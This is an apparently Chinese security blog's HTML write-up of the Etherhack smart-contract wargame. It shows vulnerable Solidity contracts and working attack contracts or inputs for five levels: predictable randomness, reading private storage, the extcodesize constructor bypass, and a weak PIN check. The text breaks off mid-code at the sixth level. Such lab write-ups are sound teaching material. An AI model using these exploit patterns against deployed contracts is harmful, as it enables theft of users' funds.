<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.0">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="//cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.15.1/css/all.min.css">
  <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/animate.css@3.1.1/animate.min.css">

<script class="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"zpano.cn","root":"/","images":"/images","scheme":"Pisces","version":"8.0.2","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12},"copycode":true,"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"},"path":"/search.xml","localsearch":{"enable":true,"trigger":"auto","top_n_per_article":5,"unescape":false,"preload":false}};
  </script>

  <meta name="description" content="补上之前少写的一题">
<meta property="og:type" content="article">
<meta property="og:title" content="Etherhack wp">
<meta property="og:url" content="https://zpano.cn/2022/03/10/35/index.html">
<meta property="og:site_name" content="Zpano&#39;s Blog">
<meta property="og:description" content="补上之前少写的一题">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://zpano.cn/2022/03/10/35/image-20210926180727962.png">
<meta property="og:image" content="https://zpano.cn/2022/03/10/35/image-20220310223837749.png">
<meta property="og:image" content="https://zpano.cn/2022/03/10/35/image-20220310224057554.png">
<meta property="article:published_time" content="2022-03-10T14:42:09.000Z">
<meta property="article:modified_time" content="2022-03-11T04:27:24.243Z">
<meta property="article:author" content="Zpano">
<meta property="article:tag" content="区块链安全">
<meta property="article:tag" content="智能合约安全">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://zpano.cn/2022/03/10/35/image-20210926180727962.png">


<link rel="canonical" href="https://zpano.cn/2022/03/10/35/">


<script class="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>Etherhack wp | Zpano's Blog</title>
  






  <noscript>
  <style>
  body { margin-top: 2rem; }

  .use-motion .menu-item,
  .use-motion .sidebar,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header {
    visibility: visible;
  }

  .use-motion .header,
  .use-motion .site-brand-container .toggle,
  .use-motion .footer { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle,
  .use-motion .custom-logo-image {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line {
    transform: scaleX(1);
  }

  .search-pop-overlay, .sidebar-nav { display: none; }
  .sidebar-panel { display: block; }
  </style>
</noscript>

<!-- hexo injector head_end start -->
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/katex@0.12.0/dist/katex.min.css">
<!-- hexo injector head_end end --></head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <h1 class="site-title">Zpano's Blog</h1>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description">不负韶华，不负野心</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
        <li class="menu-item menu-item-links">

    <a href="/links" rel="section"><i class="fa fa-link fa-fw"></i>友链</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off" maxlength="80"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div class="search-result-container no-result">
  <div class="search-result-icon">
    <i class="fa fa-spinner fa-pulse fa-5x"></i>
  </div>
</div>

    </div>
  </div>

</div>
        
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>

  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <section class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E7%AE%80%E4%BB%8B"><span class="nav-number">1.</span> <span class="nav-text">简介</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Azino-777"><span class="nav-number">2.</span> <span class="nav-text">Azino 777</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Private-Ryan"><span class="nav-number">3.</span> <span class="nav-text">Private Ryan</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Wheel-of-Fortune"><span class="nav-number">4.</span> <span class="nav-text">Wheel of Fortune</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Call-Me-Maybe"><span class="nav-number">5.</span> <span class="nav-text">Call Me Maybe</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#The-Lock"><span class="nav-number">6.</span> <span class="nav-text">The Lock</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Pirate-Ship"><span class="nav-number">7.</span> <span class="nav-text">Pirate Ship</span></a></li></ol></div>
        </section>
        <!--/noindex-->

        <section class="site-overview-wrap sidebar-panel">
          <div class="site-author site-overview-item animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Zpano"
      src="/images/avatar.jpg">
  <p class="site-author-name" itemprop="name">Zpano</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap site-overview-item animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">26</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">7</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">15</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="cc-license site-overview-item animated" itemprop="license">
    <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/zh-CN" class="cc-opacity" rel="noopener" target="_blank"><img src="/images/cc-by-nc-sa.svg" alt="Creative Commons"></a>
  </div>



        </section>
      </div>
    </div>
  </aside>
  <div class="sidebar-dimmer"></div>


    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


    <div class="main-inner post posts-expand">
      

      

  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://zpano.cn/2022/03/10/35/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.jpg">
      <meta itemprop="name" content="Zpano">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Zpano's Blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          Etherhack wp
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2022-03-10 22:42:09" itemprop="dateCreated datePublished" datetime="2022-03-10T22:42:09+08:00">2022-03-10</time>
    </span>
      <span class="post-meta-item">
        <span class="post-meta-item-icon">
          <i class="far fa-calendar-check"></i>
        </span>
        <span class="post-meta-item-text">更新于</span>
        <time title="修改时间：2022-03-11 12:27:24" itemprop="dateModified" datetime="2022-03-11T12:27:24+08:00">2022-03-11</time>
      </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">分类于</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/%E5%8C%BA%E5%9D%97%E9%93%BE%E5%AE%89%E5%85%A8/" itemprop="url" rel="index"><span itemprop="name">区块链安全</span></a>
        </span>
    </span>

  
    <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="far fa-eye"></i>
      </span>
      <span class="post-meta-item-text">阅读次数：</span>
      <span id="busuanzi_value_page_pv"></span>
    </span>
      </div>
      <div class="post-meta">
    <span class="post-meta-item" title="本文字数">
      <span class="post-meta-item-icon">
        <i class="far fa-file-word"></i>
      </span>
      <span class="post-meta-item-text">本文字数：</span>
      <span>9k</span>
    </span>
    <span class="post-meta-item" title="阅读时长">
      <span class="post-meta-item-icon">
        <i class="far fa-clock"></i>
      </span>
      <span class="post-meta-item-text">阅读时长 &asymp;</span>
      <span>8 分钟</span>
    </span>
</div>

            <div class="post-description">补上之前少写的一题</div>
        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">
        <h1 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h1><p>写一下这个靶场的wp—<a target="_blank" rel="noopener" href="https://etherhack.positive.com/">Etherhack</a></p>
<h1 id="Azino-777"><a href="#Azino-777" class="headerlink" title="Azino 777"></a>Azino 777</h1><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">pragma solidity ^0.4.16;</span><br><span class="line"></span><br><span class="line">contract Azino777 &#123;</span><br><span class="line"></span><br><span class="line">  function spin(uint256 bet) public payable &#123;</span><br><span class="line">    require(msg.value &gt;&#x3D; 0.01 ether);</span><br><span class="line">    uint256 num &#x3D; rand(100);</span><br><span class="line">    if(num &#x3D;&#x3D; bet) &#123;</span><br><span class="line">        msg.sender.transfer(this.balance);</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  &#x2F;&#x2F;Generate random number between 0 &amp; max</span><br><span class="line">  uint256 constant private FACTOR &#x3D;  1157920892373161954235709850086879078532699846656405640394575840079131296399;</span><br><span class="line">  function rand(uint max) constant private returns (uint256 result)&#123;</span><br><span class="line">    uint256 factor &#x3D; FACTOR * 100 &#x2F; max;</span><br><span class="line">    uint256 lastBlockNumber &#x3D; block.number - 1;</span><br><span class="line">    uint256 hashVal &#x3D; uint256(block.blockhash(lastBlockNumber));</span><br><span class="line"></span><br><span class="line">    return uint256((uint256(hashVal) &#x2F; factor)) % max;</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  function() public payable &#123;&#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>随机数问题，如果我们能得知rand(100) 的结果，也就能绕过num == bet的限制，让受害合约给我们转账。而rand(100) 的结果主要取决于block.number，而在一个区块内block.number是确定的，也就是我们在一个攻击合约的函数内同时调用rand函数和 spin函数，就能绕过随机数限制。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">function WeakRandomAttack(address _target) public payable &#123;</span><br><span class="line">    target &#x3D; Azino777(_target);</span><br><span class="line">&#125;</span><br><span class="line">function attack() public &#123;</span><br><span class="line">    uint256 num &#x3D; rand(100);</span><br><span class="line">    target.spin.value(0.01 ether)(num);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<h1 id="Private-Ryan"><a href="#Private-Ryan" class="headerlink" title="Private Ryan"></a>Private Ryan</h1><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line">pragma solidity ^0.4.16;</span><br><span class="line"></span><br><span class="line">contract PrivateRyan &#123;</span><br><span class="line">  uint private seed &#x3D; 1;</span><br><span class="line"></span><br><span class="line">  function PrivateRyan() &#123;</span><br><span class="line">    seed &#x3D; rand(256);</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  function spin(uint256 bet) public payable &#123;</span><br><span class="line">    require(msg.value &gt;&#x3D; 0.01 ether);</span><br><span class="line">    uint256 num &#x3D; rand(100);</span><br><span class="line">    seed &#x3D; rand(256);</span><br><span class="line">    if(num &#x3D;&#x3D; bet) &#123;</span><br><span class="line">        msg.sender.transfer(this.balance);</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  &#x2F;&#x2F;Generate random number between 0 &amp; max</span><br><span class="line">  uint256 constant private FACTOR &#x3D;  1157920892373161954235709850086879078532699846656405640394575840079131296399;</span><br><span class="line">  function rand(uint max) constant private returns (uint256 result)&#123;</span><br><span class="line">    uint256 factor &#x3D; FACTOR * 100 &#x2F; max;</span><br><span class="line">    uint256 blockNumber &#x3D; block.number - seed;</span><br><span class="line">    uint256 hashVal &#x3D; uint256(block.blockhash(blockNumber));</span><br><span class="line"></span><br><span class="line">    return uint256((uint256(hashVal) &#x2F; factor)) % max;</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  function() public payable &#123;&#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>这道题也是随机数问题，合约部署时会仅调用一次PrivateRyan() 函数，将seed的值改变，此时我们可以使用区块链浏览器读取合约上的状态值，也可以使用 <a target="_blank" rel="noopener" href="https://github.com/ethereum/wiki/wiki/JavaScript-API#web3ethgetstorageat">web3.eth.getStorageAt()</a> 函数来读取。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">contract Attack &#123;</span><br><span class="line">  PrivateRyan target;</span><br><span class="line">  uint private seed;</span><br><span class="line">  function Attack (address _target, uint _seed) public payable &#123;</span><br><span class="line">    target &#x3D; PrivateRyan(_target);</span><br><span class="line">    seed &#x3D; _seed;</span><br><span class="line">  &#125;</span><br><span class="line">  function attack() public &#123;</span><br><span class="line">    uint256 num &#x3D; seed;</span><br><span class="line">    target.spin.value(0.01 ether)(seed);</span><br><span class="line">  &#125;</span><br><span class="line">  </span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<h1 id="Wheel-of-Fortune"><a href="#Wheel-of-Fortune" class="headerlink" title="Wheel of Fortune"></a>Wheel of Fortune</h1><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line">pragma solidity ^0.4.16;</span><br><span class="line"></span><br><span class="line">contract WheelOfFortune &#123;</span><br><span class="line">  Game[] public games;</span><br><span class="line"></span><br><span class="line">  struct Game &#123;</span><br><span class="line">      address player;</span><br><span class="line">      uint id;</span><br><span class="line">      uint bet;</span><br><span class="line">      uint blockNumber;</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  function spin(uint256 _bet) public payable &#123;</span><br><span class="line">    require(msg.value &gt;&#x3D; 0.01 ether);</span><br><span class="line">    uint gameId &#x3D; games.length;</span><br><span class="line">    games.length++;</span><br><span class="line">    games[gameId].id &#x3D; gameId;</span><br><span class="line">    games[gameId].player &#x3D; msg.sender;</span><br><span class="line">    games[gameId].bet &#x3D; _bet;</span><br><span class="line">    games[gameId].blockNumber &#x3D; block.number;</span><br><span class="line">    if (gameId &gt; 0) &#123;</span><br><span class="line">      uint lastGameId &#x3D; gameId - 1;</span><br><span class="line">      uint num &#x3D; rand(block.blockhash(games[lastGameId].blockNumber), 100);</span><br><span class="line">      if(num &#x3D;&#x3D; games[lastGameId].bet) &#123;</span><br><span class="line">          games[lastGameId].player.transfer(this.balance);</span><br><span class="line">      &#125;</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  function rand(bytes32 hash, uint max) pure private returns (uint256 result)&#123;</span><br><span class="line">    return uint256(keccak256(hash)) % max;</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  function() public payable &#123;&#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>依旧是随机数问题，要求满足_bet == num，_bet 是传入的参数，sum 是上一个games用户注册时的block.number进行一些运算得到的。也就是说如果我们提前知道上一个用户注册时的block.number，就能推算出num。显然我们在同一区块进行两次注册，就能在第二次的使用block.number得到上一个用户的blockNumber。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">contract attack&#123;</span><br><span class="line">    uint num;</span><br><span class="line">    WheelOfFortune a &#x3D;  WheelOfFortune(claim contract address);</span><br><span class="line">    function rand(bytes32 hash, uint max) pure private returns (uint256 result)&#123;</span><br><span class="line">        return uint256(keccak256(hash)) % max;</span><br><span class="line">    &#125;</span><br><span class="line">    function attacke() payable public&#123;</span><br><span class="line">       </span><br><span class="line">                                     </span><br><span class="line">        num &#x3D; rand(block.blockhash(block.number), 100);</span><br><span class="line">        a.spin.value(0.01 ether)(num);</span><br><span class="line">        a.spin.value(0.01 ether)(num);</span><br><span class="line">    &#125;</span><br><span class="line">    function balance()  public view returns (uint) &#123;&#x2F;&#x2F;检测余额变化，用于验证是否攻击成功</span><br><span class="line">        return  address(this).balance;</span><br><span class="line">    &#125;</span><br><span class="line">    function() payable public&#123;&#125;</span><br><span class="line">    function  attack() payable public&#123;&#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<h1 id="Call-Me-Maybe"><a href="#Call-Me-Maybe" class="headerlink" title="Call Me Maybe"></a>Call Me Maybe</h1><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">contract CallMeMaybe &#123;</span><br><span class="line">    modifier CallMeMaybe() &#123;</span><br><span class="line">      uint32 size;</span><br><span class="line">      address _addr &#x3D; msg.sender;</span><br><span class="line">      assembly &#123;</span><br><span class="line">        size :&#x3D; extcodesize(_addr)</span><br><span class="line">      &#125;</span><br><span class="line">      if (size &gt; 0) &#123;</span><br><span class="line">          revert();</span><br><span class="line">      &#125;</span><br><span class="line">      _;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    function HereIsMyNumber() CallMeMaybe &#123;</span><br><span class="line">        if(tx.origin &#x3D;&#x3D; msg.sender) &#123;</span><br><span class="line">            revert();</span><br><span class="line">        &#125; else &#123;</span><br><span class="line">            msg.sender.transfer(this.balance);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    function() payable &#123;&#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>通过分析CallMeMaybe关键词，发现只能是要求调用地址的代码等于0。在分析HereIsMyNumber()函数，又要求tx.origin == msg.sender，这需要我们通过部署合约调用解决，但是extcodesize(_addr)=0又怎么解决呢。其实在合约创建初期的时候合约的extcodesize是等于零的。所以我可以可以写出下面的合约攻击</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">contract attack&#123;</span><br><span class="line"></span><br><span class="line">    constructor(CallMeMaybe _target) public &#123;</span><br><span class="line">        _target.HereIsMyNumber();</span><br><span class="line">    &#125; </span><br><span class="line">    function() payable &#123;&#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<h1 id="The-Lock"><a href="#The-Lock" class="headerlink" title="The Lock"></a>The Lock</h1><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line">pragma solidity ^0.4.18;</span><br><span class="line"></span><br><span class="line">contract TheLock &#123;</span><br><span class="line">    bool public unlocked;</span><br><span class="line"></span><br><span class="line">    function TheLock() public &#123;</span><br><span class="line">      unlocked &#x3D; false;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    function unlock(bytes4 pin) public payable returns(bool) &#123;</span><br><span class="line">        require(msg.value &gt;&#x3D; 0.5 ether);</span><br><span class="line">        uint result;</span><br><span class="line">        uint sum;</span><br><span class="line">        for (uint8 i &#x3D; 0; i &lt; 4; i++) &#123;</span><br><span class="line">            uint c &#x3D; uint(pin[i]);</span><br><span class="line">            if (c &gt;&#x3D; 48 &amp;&amp; c &lt;&#x3D; 57) &#123;</span><br><span class="line">                uint digit &#x3D; c - 48;</span><br><span class="line">                sum +&#x3D; digit ** 4;</span><br><span class="line">                result &#x3D; result * 10 + digit;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        if(sum &#x3D;&#x3D; result) &#123;</span><br><span class="line">            unlocked &#x3D; true;</span><br><span class="line">            return true;</span><br><span class="line">        &#125;</span><br><span class="line">        return false;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>题目环境不太行，就在github上面找到<a target="_blank" rel="noopener" href="https://github.com/Raz0r/etherhack/blob/master/levels/TheLock.sol">源码</a></p>
<p>可以看到我们需要调用unlock函数置unlocked = true。</p>
<p>我们可以将pin分为四部分</p>
<figure class="highlight gcode"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">(pin[0]-48)</span> ^ <span class="number">4</span> + <span class="comment">(pin[1]-48)</span> ^ <span class="number">4</span> + <span class="comment">(pin[2]-48)</span> ^ <span class="number">4</span> + <span class="comment">(pin[3]-48)</span> ^ <span class="number">4</span> == <span class="comment">(pin[0]-48)</span> *<span class="number">1000</span> + <span class="comment">(pin[1]-48)</span> *<span class="number">100</span> + <span class="comment">(pin[2]-48)</span> *<span class="number">10</span> + <span class="comment">(pin[3]-48)</span> </span><br></pre></td></tr></table></figure>
<p>很明显如果pin[]-48等于零自然就成立，也就是0x30303030</p>
<p>还有一种result与sum变量声明之后，如果不进行运算也是可以相等的，0x00000000等等</p>
<h1 id="Pirate-Ship"><a href="#Pirate-Ship" class="headerlink" title="Pirate Ship"></a>Pirate Ship</h1><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span 